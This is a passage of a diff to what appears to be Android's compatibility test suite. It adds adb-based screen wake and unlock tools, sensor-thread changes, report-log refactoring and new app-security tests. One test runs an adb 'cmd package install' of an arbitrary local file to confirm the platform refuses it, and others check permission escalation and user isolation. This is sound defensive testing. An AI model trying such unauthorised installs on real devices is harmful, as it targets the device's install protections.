+ for s in sys.argv[1:]:
+ if s[:7] == 'screen=' and len(s) > 7:
+ screen_id = s[7:]
+
+ if not screen_id:
+ print 'Error: need to specify screen serial'
+ assert False
+
+ cmd = ('adb -s %s shell dumpsys power | egrep "Display Power"'
+ % screen_id)
+ process = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE)
+ cmd_ret = process.stdout.read()
+ screen_state = re.split(r'[s|=]', cmd_ret)[-1]
+ if screen_state == 'OFF\n':
+ print 'Screen OFF. Turning ON.'
+ else:
+ wakeup = ('adb -s %s shell input keyevent POWER' % screen_id)
+ subprocess.Popen(wakeup.split())
+if __name__ == '__main__':
+ main()
diff --git a/apps/CameraITS/tools/wake_up_screen.py b/apps/CameraITS/tools/wake_up_screen.py
new file mode 100644
index 0000000..68a974a
--- /dev/null
+++ b/apps/CameraITS/tools/wake_up_screen.py
@@ -0,0 +1,60 @@
+# Copyright 2015 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+import re
+import subprocess
+import sys
+import time
+
+DISPLAY_LEVEL = 96 # [0:255] Depends on tablet model. Adjust for best result.
+DISPLAY_WAIT = 0.5 # seconds. Screen commands take time to have effect
+
+
+def main():
+ """Power up and unlock screen as needed."""
+ screen_id = None
+ for s in sys.argv[1:]:
+ if s[:7] == 'screen=' and len(s) > 7:
+ screen_id = s[7:]
+
+ if not screen_id:
+ print 'Error: need to specify screen serial'
+ assert False
+
+ # turn on screen if necessary and unlock
+ cmd = ('adb -s %s shell dumpsys display | egrep "mScreenState"'
+ % screen_id)
+ process = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE)
+ cmd_ret = process.stdout.read()
+ screen_state = re.split(r'[s|=]', cmd_ret)[-1]
+ if 'OFF' in screen_state:
+ print 'Screen OFF. Turning ON.'
+ wakeup = ('adb -s %s shell input keyevent POWER' % screen_id)
+ subprocess.Popen(wakeup.split())
+ time.sleep(DISPLAY_WAIT)
+ unlock = ('adb -s %s wait-for-device shell wm dismiss-keyguard'
+ % screen_id)
+ subprocess.Popen(unlock.split())
+ time.sleep(DISPLAY_WAIT)
+
+ # set brightness
+ print 'Tablet display brightness set to %d' % DISPLAY_LEVEL
+ bright = ('adb -s %s shell settings put system screen_brightness %d'
+ % (screen_id, DISPLAY_LEVEL))
+ subprocess.Popen(bright.split())
+ time.sleep(DISPLAY_WAIT)
+
+
+if __name__ == '__main__':
+ main()
diff --git a/apps/CtsVerifier/AndroidManifest.xml b/apps/CtsVerifier/AndroidManifest.xml
index 8b96c00..15da68f 100644
--- a/apps/CtsVerifier/AndroidManifest.xml
+++ b/apps/CtsVerifier/AndroidManifest.xml
@@ -18,7 +18,7 @@
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
package="com.android.cts.verifier"
android:versionCode="5"
- android:versionName="7.0_r7">
+ android:versionName="7.0_r0">
<uses-sdk android:minSdkVersion="19" android:targetSdkVersion="24"/>
diff --git a/apps/CtsVerifier/src/com/android/cts/verifier/camera/its/ItsService.java b/apps/CtsVerifier/src/com/android/cts/verifier/camera/its/ItsService.java
index 6f54821..9a7c351 100644
--- a/apps/CtsVerifier/src/com/android/cts/verifier/camera/its/ItsService.java
+++ b/apps/CtsVerifier/src/com/android/cts/verifier/camera/its/ItsService.java
@@ -197,6 +197,8 @@
private volatile LinkedList<MySensorEvent> mEvents = null;
private volatile Object mEventLock = new Object();
private volatile boolean mEventsEnabled = false;
+ private HandlerThread mSensorThread = null;
+ private Handler mSensorHandler = null;
public interface CaptureCallback {
void onCaptureAvailable(Image capture);
@@ -228,9 +230,15 @@
mAccelSensor = mSensorManager.getDefaultSensor(Sensor.TYPE_ACCELEROMETER);
mMagSensor = mSensorManager.getDefaultSensor(Sensor.TYPE_MAGNETIC_FIELD);
mGyroSensor = mSensorManager.getDefaultSensor(Sensor.TYPE_GYROSCOPE);
- mSensorManager.registerListener(this, mAccelSensor, SensorManager.SENSOR_DELAY_FASTEST);
- mSensorManager.registerListener(this, mMagSensor, SensorManager.SENSOR_DELAY_FASTEST);
- mSensorManager.registerListener(this, mGyroSensor, SensorManager.SENSOR_DELAY_FASTEST);
+ mSensorThread = new HandlerThread("SensorThread");
+ mSensorThread.start();
+ mSensorHandler = new Handler(mSensorThread.getLooper());
+ mSensorManager.registerListener(this, mAccelSensor,
+ SensorManager.SENSOR_DELAY_NORMAL, mSensorHandler);
+ mSensorManager.registerListener(this, mMagSensor,
+ SensorManager.SENSOR_DELAY_NORMAL, mSensorHandler);
+ mSensorManager.registerListener(this, mGyroSensor,
+ /*200hz*/5000, mSensorHandler);
// Get a handle to the system vibrator.
mVibrator = (Vibrator)getSystemService(Context.VIBRATOR_SERVICE);
@@ -291,6 +299,10 @@
mSaveThreads[i] = null;
}
}
+ if (mSensorThread != null) {
+ mSensorThread.quitSafely();
+ mSensorThread = null;
+ }
if (mResultThread != null) {
mResultThread.quitSafely();
mResultThread = null;
@@ -1277,6 +1289,8 @@
// Initiate the captures.
long maxExpTimeNs = -1;
+ List<CaptureRequest> requestList =
+ new ArrayList<>(requests.size());
for (int i = 0; i < requests.size(); i++) {
CaptureRequest.Builder req = requests.get(i);
// For DNG captures, need the LSC map to be available.
@@ -1291,8 +1305,9 @@
for (int j = 0; j < numCaptureSurfaces; j++) {
req.addTarget(mOutputImageReaders[j].getSurface());
}
- mSession.capture(req.build(), mCaptureResultListener, mResultHandler);
+ requestList.add(req.build());
}
+ mSession.captureBurst(requestList, mCaptureResultListener, mResultHandler);
long timeout = TIMEOUT_CALLBACK * 1000;
if (maxExpTimeNs > 0) {
@@ -1478,6 +1493,11 @@
}
@Override
+ public final void onAccuracyChanged(Sensor sensor, int accuracy) {
+ Logt.i(TAG, "Sensor " + sensor.getName() + " accuracy changed to " + accuracy);
+ }
+
+ @Override
public final void onSensorChanged(SensorEvent event) {
synchronized(mEventLock) {
if (mEventsEnabled) {
@@ -1492,10 +1512,6 @@
}
}
- @Override
- public final void onAccuracyChanged(Sensor sensor, int accuracy) {
- }
-
private final CaptureCallback mCaptureCallback = new CaptureCallback() {
@Override
public void onCaptureAvailable(Image capture) {
diff --git a/common/device-side/preconditions/src/com/android/compatibility/common/preconditions/ScreenLockHelper.java b/common/device-side/preconditions/src/com/android/compatibility/common/preconditions/ScreenLockHelper.java
index 385f22f..d2380af 100644
--- a/common/device-side/preconditions/src/com/android/compatibility/common/preconditions/ScreenLockHelper.java
+++ b/common/device-side/preconditions/src/com/android/compatibility/common/preconditions/ScreenLockHelper.java
@@ -18,7 +18,6 @@
import android.app.KeyguardManager;
import android.content.Context;
-import android.os.Build;
/**
* ScreenLockHelper is used to check whether the device is protected by a locked screen.
@@ -30,9 +29,6 @@
* is no way to programmatically distinguish between the two.
*/
public static boolean isDeviceSecure(Context context) {
- if (Build.VERSION.SDK_INT < Build.VERSION_CODES.M) {
- return true; // KeyguardManager.isDeviceSecure() added in M, skip this check
- }
KeyguardManager km = (KeyguardManager) context.getSystemService(Context.KEYGUARD_SERVICE);
return km.isDeviceSecure();
}
diff --git a/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/targetprep/ReportLogCollector.java b/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/targetprep/ReportLogCollector.java
index a1c8a4a..ccb9faf 100644
--- a/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/targetprep/ReportLogCollector.java
+++ b/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/targetprep/ReportLogCollector.java
@@ -17,6 +17,7 @@
package com.android.compatibility.common.tradefed.targetprep;
import com.android.compatibility.common.tradefed.build.CompatibilityBuildHelper;
+import com.android.compatibility.common.tradefed.util.CollectorUtil;
import com.android.tradefed.build.IBuildInfo;
import com.android.tradefed.config.Option;
import com.android.tradefed.device.DeviceNotAvailableException;
@@ -27,18 +28,8 @@
import com.android.tradefed.targetprep.TargetSetupError;
import com.android.tradefed.util.FileUtil;
-import java.io.BufferedReader;
-import java.io.BufferedWriter;
import java.io.File;
import java.io.FileNotFoundException;
-import java.io.FileReader;
-import java.io.FileWriter;
-import java.io.IOException;
-import java.util.ArrayList;
-import java.util.HashMap;
-import java.util.List;
-import java.util.regex.Matcher;
-import java.util.regex.Pattern;
/**
* An {@link ITargetCleaner} that prepares and pulls report logs.
@@ -59,12 +50,12 @@
@Override
public void setUp(ITestDevice device, IBuildInfo buildInfo) throws TargetSetupError,
- BuildError, DeviceNotAvailableException {
+ BuildError, DeviceNotAvailableException {
prepareReportLogContainers(device, buildInfo);
}
private void addBuildInfo(ITestDevice device, IBuildInfo buildInfo, String key, String value)
- throws DeviceNotAvailableException {
+ throws DeviceNotAvailableException {
}
private void prepareReportLogContainers(ITestDevice device, IBuildInfo buildInfo) {
@@ -103,93 +94,12 @@
CLog.e("%s is not a directory", hostReportDir.getAbsolutePath());
return;
}
- pull(device, mSrcDir, hostReportDir, resultDir);
- reformatRepeatedStreams(resultDir);
+ String resultPath = resultDir.getAbsolutePath();
+ CollectorUtil.pullFromDevice(device, mSrcDir, resultPath);
+ CollectorUtil.pullFromHost(hostReportDir, resultDir);
+ CollectorUtil.reformatRepeatedStreams(resultDir);
} catch (Exception exception) {
exception.printStackTrace();
}
}
-
- private void pull(ITestDevice device, String deviceSrc, File hostDir, File destDir) {
- String hostSrc = hostDir.getAbsolutePath();
- String dest = destDir.getAbsolutePath();
- String deviceSideCommand = String.format("adb -s %s pull %s %s", device.getSerialNumber(),
- deviceSrc, dest);
- try {
- if (device.doesFileExist(deviceSrc)) {
- Process deviceProcess = Runtime.getRuntime().exec(new String[]{"/bin/bash", "-c",
- deviceSideCommand});
- if (deviceProcess.waitFor() != 0) {
- CLog.e("Failed to run %s", deviceSideCommand);
- }
- }
- FileUtil.recursiveCopy(hostDir, destDir);
- FileUtil.recursiveDelete(hostDir);
- } catch (Exception e) {
- CLog.e("Caught exception during pull.");
- CLog.e(e);
- }
- }
-
- private void reformatRepeatedStreams(File resultDir) throws IOException, FileNotFoundException {
- File[] reportLogs = resultDir.listFiles();
- // Sometimes report logs are in a sub-directory.
- if (reportLogs.length == 1 && reportLogs[0].isDirectory()) {
- reportLogs = reportLogs[0].listFiles();
- }
- for (File reportLog : reportLogs) {
- try (BufferedReader metricsReader = new BufferedReader(new FileReader(reportLog))) {
- // Get metrics as string.
- StringBuilder metricBuilder = new StringBuilder();
- String line;
- while ((line = metricsReader.readLine()) != null) {
- metricBuilder.append(line);
- }
- String metrics = metricBuilder.toString();
- // Create map of stream names and metrics.
- HashMap<String, List<String>> metricsMap = new HashMap<>();
- String pattern = "\\\"([a-z0-9_]*)\\\":(\\{[^{}]*\\})";
- Pattern p = Pattern.compile(pattern);
- Matcher m = p.matcher(metrics);
- while (m.find()) {
- String key = m.group(1);
- String value = m.group(2);
- if (!metricsMap.containsKey(key)) {
- metricsMap.put(key, new ArrayList<String>());
- }
- metricsMap.get(key).add(value);
- }
- // Rewrite metrics as arrays.
- StringBuilder newMetricsBuilder = new StringBuilder();
- newMetricsBuilder.append("{");
- boolean firstLine = true;
- for (String key: metricsMap.keySet()) {
- if (!firstLine) {
- newMetricsBuilder.append(",");
- } else {
- firstLine = false;
- }
- newMetricsBuilder.append("\"").append(key).append("\":[");
- boolean firstValue = true;
- for (String stream : metricsMap.get(key)) {
- if (!firstValue) {
- newMetricsBuilder.append(",");
- }
- else {
- firstValue = false;
- }
- newMetricsBuilder.append(stream);
- }
- newMetricsBuilder.append("]");
- }
- newMetricsBuilder.append("}");
- reportLog.createNewFile();
- try (BufferedWriter metricsWriter = new BufferedWriter(new
- FileWriter(reportLog))) {
- String newMetrics = newMetricsBuilder.toString();
- metricsWriter.write(newMetrics, 0, newMetrics.length());
- }
- }
- }
- }
}
diff --git a/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/testtype/CompatibilityTest.java b/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/testtype/CompatibilityTest.java
index f63093c..42391f1 100644
--- a/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/testtype/CompatibilityTest.java
+++ b/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/testtype/CompatibilityTest.java
@@ -98,6 +98,7 @@
private static final String SHARD_OPTION = "shards";
public static final String SKIP_DEVICE_INFO_OPTION = "skip-device-info";
public static final String SKIP_PRECONDITIONS_OPTION = "skip-preconditions";
+ public static final String PRIMARY_ABI_RUN = "primary-abi-only";
public static final String DEVICE_TOKEN_OPTION = "device-token";
public static final String LOGCAT_ON_FAILURE_SIZE_OPTION = "logcat-on-failure-size";
private static final String URL = "dynamic-config-url";
@@ -201,6 +202,11 @@
description = "Whether preconditions should be skipped")
private boolean mSkipPreconditions = false;
+ @Option(name = PRIMARY_ABI_RUN,
+ description = "Whether to run tests with only the device primary abi. "
+ + "This override the --abi option.")
+ private boolean mPrimaryAbiRun = false;
+
@Option(name = DEVICE_TOKEN_OPTION,
description = "Holds the devices' tokens, used when scheduling tests that have"
+ "prerequisites such as requiring a SIM card. Format is <serial>:<token>",
@@ -426,7 +432,9 @@
}
// execute pre module execution checker
- runPreModuleCheck(module.getName(), checkers, mDevice, listener);
+ if (checkers != null && !checkers.isEmpty()) {
+ runPreModuleCheck(module.getName(), checkers, mDevice, listener);
+ }
try {
module.run(listener);
} catch (DeviceUnresponsiveException due) {
@@ -456,7 +464,9 @@
TimeUtil.formatElapsedTime(expected),
TimeUtil.formatElapsedTime(duration));
}
- runPostModuleCheck(module.getName(), checkers, mDevice, listener);
+ if (checkers != null && !checkers.isEmpty()) {
+ runPostModuleCheck(module.getName(), checkers, mDevice, listener);
+ }
}
} catch (FileNotFoundException fnfe) {
throw new RuntimeException("Failed to initialize modules", fnfe);
@@ -472,6 +482,15 @@
Set<IAbi> getAbis() throws DeviceNotAvailableException {
Set<IAbi> abis = new HashSet<>();
Set<String> archAbis = AbiUtils.getAbisForArch(SuiteInfo.TARGET_ARCH);
+ if (mPrimaryAbiRun) {
+ if (mAbiName == null) {
+ // Get the primary from the device and make it the --abi to run.
+ mAbiName = mDevice.getProperty("ro.product.cpu.abi").trim();
+ } else {
+ CLog.d("Option --%s supersedes the option --%s, using abi: %s", ABI_OPTION,
+ PRIMARY_ABI_RUN, mAbiName);
+ }
+ }
for (String abi : AbiFormatter.getSupportedAbis(mDevice, "")) {
// Only test against ABIs supported by Compatibility, and if the
// --abi option was given, it must match.
@@ -480,7 +499,7 @@
abis.add(new Abi(abi, AbiUtils.getBitness(abi)));
}
}
- if (abis == null || abis.isEmpty()) {
+ if (abis.isEmpty()) {
if (mAbiName == null) {
throw new IllegalArgumentException("Could not get device's ABIs");
} else {
diff --git a/common/host-side/tradefed/tests/src/com/android/compatibility/common/tradefed/result/MetadataReporterTest.java b/common/host-side/tradefed/tests/src/com/android/compatibility/common/tradefed/result/MetadataReporterTest.java
index 530bd09..dba3128 100644
--- a/common/host-side/tradefed/tests/src/com/android/compatibility/common/tradefed/result/MetadataReporterTest.java
+++ b/common/host-side/tradefed/tests/src/com/android/compatibility/common/tradefed/result/MetadataReporterTest.java
@@ -36,7 +36,6 @@
*/
public class MetadataReporterTest extends TestCase {
- private static final String ROOT_PROPERTY = "TESTS_ROOT";
private static final String MIN_TEST_DURATION = "10";
private static final String BUILD_NUMBER = "2";
private static final String SUITE_PLAN = "cts";
@@ -73,7 +72,7 @@
mBase.mkdirs();
mTests = new File(mBase, TESTCASES);
mTests.mkdirs();
- System.setProperty(ROOT_PROPERTY, mRoot.getAbsolutePath());
+ System.setProperty(CompatibilityBuildHelper.ROOT_DIR, mRoot.getAbsolutePath());
mBuildInfo = new BuildInfo(BUILD_NUMBER, "", "");
mBuildHelper = new CompatibilityBuildHelper(mBuildInfo);
mBuildHelper.init(SUITE_PLAN, DYNAMIC_CONFIG_URL, START_TIME);
diff --git a/hostsidetests/appsecurity/src/android/appsecurity/cts/AppSecurityTests.java b/hostsidetests/appsecurity/src/android/appsecurity/cts/AppSecurityTests.java
index 00acdf5..e500b00 100644
--- a/hostsidetests/appsecurity/src/android/appsecurity/cts/AppSecurityTests.java
+++ b/hostsidetests/appsecurity/src/android/appsecurity/cts/AppSecurityTests.java
@@ -25,9 +25,17 @@
import com.android.tradefed.testtype.IAbi;
import com.android.tradefed.testtype.IAbiReceiver;
import com.android.tradefed.testtype.IBuildReceiver;
+import com.android.tradefed.util.RunUtil;
+import java.io.BufferedReader;
+import java.io.EOFException;
import java.io.File;
import java.io.FileNotFoundException;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.InputStreamReader;
+import java.util.ArrayList;
+import java.util.List;
/**
* Set of tests that verify various security checks involving multiple apps are
@@ -289,6 +297,26 @@
}
}
+ /**
+ * Tests that an arbitrary file cannot be installed using the 'cmd' command.
+ */
+ public void testAdbInstallFile() throws Exception {
+ final List<String> output = AdbOutputReader.getOutput(5000L, new String[] {
+ "adb",
+ "-s",
+ getDevice().getSerialNumber(),
+ "shell",
+ "cmd",
+ "package",
+ "install",
+ "-S",
+ "1024",
+ "/data/local/tmp/foo.apk",
+ });
+ assertEquals("Line count", 1, output.size());
+ assertEquals("Error text", "Error: APK content must be streamed", output.get(0));
+ }
+
private void runDeviceTests(String packageName) throws DeviceNotAvailableException {
Utils.runDeviceTests(getDevice(), packageName);
}
@@ -297,4 +325,66 @@
throws DeviceNotAvailableException {
Utils.runDeviceTests(getDevice(), packageName, testClassName, testMethodName);
}
+
+ /** Helper class to collect the output from a command. */
+ private static class AdbOutputReader {
+ public static List<String> getOutput(long timeout, String... command) throws Exception {
+ final Process adbProcess = RunUtil.getDefault().runCmdInBackground(command);
+ final InputStream in = adbProcess.getInputStream();
+ final List<String> lines = new ArrayList<>();
+ final Object threadLock = new Object();
+ final Thread t = new Thread(new Runnable() {
+ @Override
+ public void run() {
+ synchronized (threadLock) {
+ readLines(in, lines);
+ threadLock.notify();
+ }
+ }
+ });
+ final long end = System.currentTimeMillis() + timeout;
+ synchronized (threadLock) {
+ t.start();
+ long now = System.currentTimeMillis();
+ while (now < end) {
+ try {
+ threadLock.wait(end - now);
+ } catch (InterruptedException e) {
+ now = System.currentTimeMillis();
+ continue;
+ }
+ break;
+ }
+ }
+ adbProcess.destroy();
+ t.join();
+ return lines;
+ }
+
+ private static void readLines(InputStream in, List<String> lines) {
+ BufferedReader br = null;
+ try {
+ br = new BufferedReader(new InputStreamReader(in));
+ String line;
+ while ((line = readLineIgnoreException(br)) != null) {
+ lines.add(line);
+ }
+ } catch (IOException ignore) {
+ } finally {
+ if (br != null) {
+ try {
+ br.close();
+ } catch (IOException ignore) { }
+ }
+ }
+ }
+
+ private static String readLineIgnoreException(BufferedReader reader) throws IOException {
+ try {
+ return reader.readLine();
+ } catch (EOFException ignore) {
+ return null;
+ }
+ }
+ }
}
diff --git a/hostsidetests/appsecurity/src/android/appsecurity/cts/DirectBootHostTest.java b/hostsidetests/appsecurity/src/android/appsecurity/cts/DirectBootHostTest.java
index a4686aa..99a7e8f 100644
--- a/hostsidetests/appsecurity/src/android/appsecurity/cts/DirectBootHostTest.java
+++ b/hostsidetests/appsecurity/src/android/appsecurity/cts/DirectBootHostTest.java
@@ -111,9 +111,6 @@
/**
* If device doesn't have native FBE, verify normal lifecycle.
- * Note: This test will have a false-negative on the emulator because of the
- * tradefed and ddmlib incorrectly special-case handling the emulator which
- * is fixed in http://r.android.com/315302
*/
public void testDirectBootNone() throws Exception {
if (!isSupportedDevice()) {
diff --git a/hostsidetests/appsecurity/src/android/appsecurity/cts/ExternalStorageHostTest.java b/hostsidetests/appsecurity/src/android/appsecurity/cts/ExternalStorageHostTest.java
index c49340e..52dc79b 100644
--- a/hostsidetests/appsecurity/src/android/appsecurity/cts/ExternalStorageHostTest.java
+++ b/hostsidetests/appsecurity/src/android/appsecurity/cts/ExternalStorageHostTest.java
@@ -224,6 +224,10 @@
// Verify they can't poke at each other
runDeviceTests(MULTIUSER_PKG, MULTIUSER_CLASS, "testUserIsolation", owner);
runDeviceTests(MULTIUSER_PKG, MULTIUSER_CLASS, "testUserIsolation", secondary);
+
+ // Verify they can't access other users' content using media provider
+ runDeviceTests(MULTIUSER_PKG, MULTIUSER_CLASS, "testMediaProviderUserIsolation", owner);
+ runDeviceTests(MULTIUSER_PKG, MULTIUSER_CLASS, "testMediaProviderUserIsolation", secondary);
} finally {
getDevice().uninstallPackage(MULTIUSER_PKG);
removeUsersForTest(users);
diff --git a/hostsidetests/appsecurity/src/android/appsecurity/cts/PermissionsHostTest.java b/hostsidetests/appsecurity/src/android/appsecurity/cts/PermissionsHostTest.java
index 072a533..050845b 100644
--- a/hostsidetests/appsecurity/src/android/appsecurity/cts/PermissionsHostTest.java
+++ b/hostsidetests/appsecurity/src/android/appsecurity/cts/PermissionsHostTest.java
@@ -29,12 +29,18 @@
* dynamic granting and behavior of legacy apps.
*/
public class PermissionsHostTest extends DeviceTestCase implements IAbiReceiver, IBuildReceiver {
- private static final String PKG = "com.android.cts.usepermission";
+ private static final String USES_PERMISSION_PKG = "com.android.cts.usepermission";
+ private static final String ESCALATE_PERMISSION_PKG = "com.android.cts.escalate.permission";
private static final String APK_22 = "CtsUsePermissionApp22.apk";
private static final String APK_23 = "CtsUsePermissionApp23.apk";
private static final String APK_24 = "CtsUsePermissionApp24.apk";
+ private static final String APK_DECLARE_NON_RUNTIME_PERMISSIONS =
+ "CtsDeclareNonRuntimePermissions.apk";
+ private static final String APK_ESCLATE_TO_RUNTIME_PERMISSIONS =
+ "CtsEscalateToRuntimePermissions.apk";
+
private IAbi mAbi;
private IBuildInfo mCtsBuild;
@@ -55,14 +61,16 @@
assertNotNull(mAbi);
assertNotNull(mCtsBuild);
- getDevice().uninstallPackage(PKG);
+ getDevice().uninstallPackage(USES_PERMISSION_PKG);
+ getDevice().uninstallPackage(ESCALATE_PERMISSION_PKG);
}
@Override
protected void tearDown() throws Exception {
super.tearDown();
- getDevice().uninstallPackage(PKG);
+ getDevice().uninstallPackage(USES_PERMISSION_PKG);
+ getDevice().uninstallPackage(ESCALATE_PERMISSION_PKG);
}
public void testFail() throws Exception {
@@ -70,7 +78,7 @@
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
try {
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testFail");
fail("Expected remote failure");
} catch (AssertionError expected) {
@@ -82,7 +90,7 @@
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
try {
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testKill");
fail("Expected remote failure");
} catch (AssertionError expected) {
@@ -93,7 +101,7 @@
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_22),
false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest22",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest22",
"testCompatDefault");
}
@@ -102,12 +110,12 @@
MigrationHelper.getTestFile(mCtsBuild, APK_22),
false, false));
try {
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest22",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest22",
"testCompatRevoked_part1");
fail("App must be killed on a permission revoke");
} catch (AssertionError expected) {
}
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest22",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest22",
"testCompatRevoked_part2");
}
@@ -115,63 +123,63 @@
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_22),
false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest22",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest22",
"testNoRuntimePrompt");
}
public void testDefault23() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testDefault");
}
public void testGranted23() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testGranted");
}
public void testInteractiveGrant23() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testInteractiveGrant");
}
public void testRuntimeGroupGrantSpecificity23() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRuntimeGroupGrantSpecificity");
}
public void testRuntimeGroupGrantExpansion23() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRuntimeGroupGrantExpansion");
}
public void testCancelledPermissionRequest23() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testCancelledPermissionRequest");
}
public void testRequestGrantedPermission23() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRequestGrantedPermission");
}
public void testDenialWithPrejudice23() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testDenialWithPrejudice");
}
@@ -179,11 +187,11 @@
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
try {
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRevokeAffectsWholeGroup_part1");
} catch (AssertionError expected) {
}
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRevokeAffectsWholeGroup_part2");
}
@@ -191,51 +199,51 @@
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
try {
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testGrantPreviouslyRevokedWithPrejudiceShowsPrompt_part1");
fail("App must be killed on a permission revoke");
} catch (Throwable expected) {
}
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testGrantPreviouslyRevokedWithPrejudiceShowsPrompt_part2");
}
public void testRequestNonRuntimePermission23() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRequestNonRuntimePermission");
}
public void testRequestNonExistentPermission23() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRequestNonExistentPermission");
}
public void testRequestPermissionFromTwoGroups23() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRequestPermissionFromTwoGroups");
}
// public void testOnlyRequestedPermissionsGranted24() throws Exception {
// assertNull(getDevice().installPackage(
// MigrationHelper.getTestFile(mCtsBuild, APK_24), false, false));
-// runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest24",
+// runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest24",
// "testOnlyRequestedPermissionsGranted");
// }
public void testUpgradeKeepsPermissions() throws Exception {
